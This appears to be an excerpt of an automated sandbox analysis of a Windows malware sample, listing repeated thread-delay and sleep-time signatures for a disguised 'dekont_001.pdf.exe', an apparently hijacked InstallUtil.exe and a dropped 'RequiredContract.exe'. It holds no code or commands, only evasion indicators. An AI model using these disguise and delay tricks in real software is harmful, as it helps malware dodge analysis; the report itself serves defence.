              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595374Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeWindow / User API: threadDelayed 1474Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeWindow / User API: threadDelayed 8374Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3215Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6618Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeWindow / User API: threadDelayed 4681Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeWindow / User API: threadDelayed 5139Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8107Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1753Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -25825441703193356s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7372Thread sleep count: 1474 > 30Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7372Thread sleep count: 8374 > 30Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99764s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99546s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -99094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98650s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98546s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98418s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98307s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98192s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -98029s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97921s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97469s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -97031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96922s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96484s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96375s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -96047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95658s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95544s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95433s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95316s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -95093s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -94984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -94875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -94765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340Thread sleep time: -94651s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -34126476536362649s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7544Thread sleep count: 3215 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599736s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599594s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7544Thread sleep count: 6618 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598891s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598563s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598438s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598216s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -598093s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597984s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597765s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597438s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597313s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -597202s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596960s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596857s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596744s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596641s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596516s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596297s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596187s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -596078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595964s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595637s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595531s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595312s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595203s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -595094s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594984s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594765s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594649s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594516s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594294s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594148s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540Thread sleep time: -594046s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -34126476536362649s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7920Thread sleep count: 4681 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7920Thread sleep count: 5139 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99891s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99781s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99672s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99562s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99453s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99344s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99234s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99125s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -99015s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -98905s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -98783s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -98667s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -98453s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -98328s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -98219s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -98095s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97969s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97844s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97734s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97625s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97515s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97406s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97297s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97187s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -97078s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96969s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96859s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96750s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96641s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96516s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96404s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96281s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96172s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -96046s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -95926s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -95635s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -95500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -95391s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -95281s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -95172s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -95059s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -94937s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -94828s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -94718s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -94609s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -94500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -94391s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888Thread sleep time: -94266s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -25825441703193356s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8084Thread sleep count: 8107 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8084Thread sleep count: 1753 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599546s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599218s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598890s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598780s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598671s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598343s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598234s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598115s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -598000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597890s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597778s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597671s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597343s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597234s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597125s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -597015s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596906s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596796s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596687s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596578s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596468s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596359s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596250s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596140s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -596030s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595921s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595812s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595703s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595593s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595484s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595374s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595265s >= -30000sJump to behavior
